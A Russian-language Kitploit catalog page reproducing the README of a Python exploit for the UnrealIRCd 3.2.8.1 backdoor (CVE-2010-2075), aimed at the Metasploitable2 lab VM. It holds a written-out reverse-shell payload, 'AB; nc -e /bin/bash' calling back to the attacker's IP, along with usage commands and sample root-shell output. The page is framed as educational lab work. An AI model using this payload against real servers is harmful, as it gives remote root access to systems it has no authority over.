Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2010-2075 — Эксплойт бэкдора UnrealIRCd 3.2.8.1 — обратная оболочка через AB; триггер, написанный с нуля на Python с использованием сырых сокетов. Без Metasploit. | Kitploit
Инструменты/GitHubGitHub/rushikesh-a-bhujbal/cve-2010-2075
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийПост-эксплуатацияТестирование на ПроникновениеБезопасность Цепочки ПоставокОбучение и ОбразованиеRed TeamingРазработка Полезной Нагрузки
Лаборатории и Практика
GitHubrushikesh-a-bhujbal/cve-2010-2075

CVE-2010-2075

Эксплойт бэкдора UnrealIRCd 3.2.8.1 — обратная оболочка через AB; триггер, написанный с нуля на Python с использованием сырых сокетов. Без Metasploit.

Репозиторий
110 ч 36 мин назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2010-2075 — Эксплойт бэкдора UnrealIRCd 3.2.8.1

Python Platform Target License


Обзор

UnrealIRCd — это IRC-сервер (Internet Relay Chat) с открытым исходным кодом — протокол, позволяющий пользователям общаться в реальном времени по сети, подобно ранним чат-платформам.

В 2009–2010 годах было обнаружено, что UnrealIRCd 3.2.8.1, распространявшийся через официальные зеркала загрузки, был скомпрометирован. Злоумышленник заменил легитимный исходный код на версию с бэкдором, содержащую скрытый триггер выполнения команд.

Это была атака на цепочку поставок — по своей природе идентичная CVE-2011-2523 (vsftpd 2.3.4). Легитимное программное обеспечение было заменено вредоносной модифицированной версией до того, как пользователи его скачали.


Как работает бэкдор

Бэкдор отслеживает все входящие данные на порту 6667. Если любой ввод начинается со строки AB;, всё, что идёт после неё, передаётся — полностью минуя всю логику IRC, аутентификацию и проверки регистрации.

напрямую в system()

Триггер срабатывает на этапе инициализации соединения, ещё до того, как IRC-сервер зарегистрирует клиента. Ни NICK, ни USER, ни аутентификация не требуются.

Схема атаки:

root@kitploit:~
Attacker (Kali)                    Target (Metasploitable2)
                                   
1. s1 connects to port 6667   
   NICK + USER handshake      →    Server sends full banner
   Read banner, check version  
   Confirm Unreal3.2.8.1      
                                   
2. Open listener on port 4444  
   (waiting for incoming shell)
                                   
3. s2 connects to port 6667   →    AB; nc -e /bin/bash KALI_IP 4444
                               →    system() executes immediately
                               →    netcat spawns bash, connects back
                                   
4. listener.accept()          ←    Incoming root shell connection
   Interactive root shell      

Обратная оболочка против привязанной оболочки

Этот эксплойт использует обратную оболочку — цель сама подключается обратно к атакующему, а не атакующий подключается к порту на цели.

ТипНаправлениеИспользуется в
Bind shellАтакующий → ЦельCVE-2011-2523 (vsftpd)
Reverse shellЦель → АтакующийCVE-2010-2075 (UnrealIRCd)

Обратные оболочки обходят правила входящего межсетевого экрана — исходящие соединения от цели блокируются редко.


Требования

  • Python 3.x
  • Без внешних библиотек — только стандартная библиотека
  • netcat, установленный на цели (присутствует по умолчанию на Metasploitable2)
  • Цель: Metasploitable2 с запущенным UnrealIRCd 3.2.8.1

Использование

root@kitploit:~
git clone https://github.com/rushikesh-a-bhujbal/CVE-2010-2075.git
cd exploit-dev/CVE-2010-2075

Отредактируйте main.py и задайте:

root@kitploit:~
kali_ip = "YOUR_KALI_IP"
target_ip = "TARGET_IP"

Запустите:

root@kitploit:~
python3 main.py

Пример вывода:

root@kitploit:~
[+] Vulnerable version confirmed. Proceeding...
[*] Listening on port 4444...
[+] Shell received from ('192.168.15.132', 58280)
> whoami
root
> uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008
> pwd
/etc/unreal
> exit

Обработка ошибок

СценарийПоведение
Порт 6667 закрытВыводит "Port Closed", корректно завершается
Неверная версияВыводит "Not vulnerable", корректно завершается
Цель не перезваниваетlistener.accept() ожидает (при необходимости добавьте таймаут)
Команда не даёт выводаrecv() молча истекает по таймауту, возвращается к приглашению

Ключевое отличие от CVE-2011-2523

CVE-2011-2523 (vsftpd)CVE-2010-2075 (UnrealIRCd)
ПротоколFTP (порт 21)IRC (порт 6667)
Триггер:) в имени пользователяПрефикс AB; в любом вводе
Тип оболочкиBind shell (порт 6200)Reverse shell (порт атакующего)
Соединения2 исходящих1 исходящее + 1 входящее

Проверено на

  • Metasploitable2 (намеренно уязвимая виртуальная машина)
  • UnrealIRCd 3.2.8.1
  • Linux metasploitable 2.6.24-16-server

Правовая оговорка

Этот эксплойт разработан строго в образовательных целях и только для авторизованных исследований в области безопасности.

Создан и протестирован исключительно на локальной виртуальной машине Metasploitable2 в полностью изолированной лабораторной среде.

Не используйте его против любой системы, которой вы не владеете или на тестирование которой у вас нет явного письменного разрешения. Неавторизованное использование незаконно в соответствии с Computer Fraud and Abuse Act (CFAA) и аналогичными законами по всему миру.

Автор не несёт ответственности за неправомерное использование этого кода.


Ссылки

  • CVE Record: https://www.cve.org/CVERecord?id=CVE-2010-2075
  • NVD Entry: https://nvd.nist.gov/vuln/detail/CVE-2010-2075
  • Original Disclosure: https://www.exploit-db.com/exploits/13853
  • Metasploitable2: https://sourceforge.net/projects/metasploitable/

Автор

Rushikesh Bhujbal
Security Research & Exploit Development
GitHub

Скачать инструмент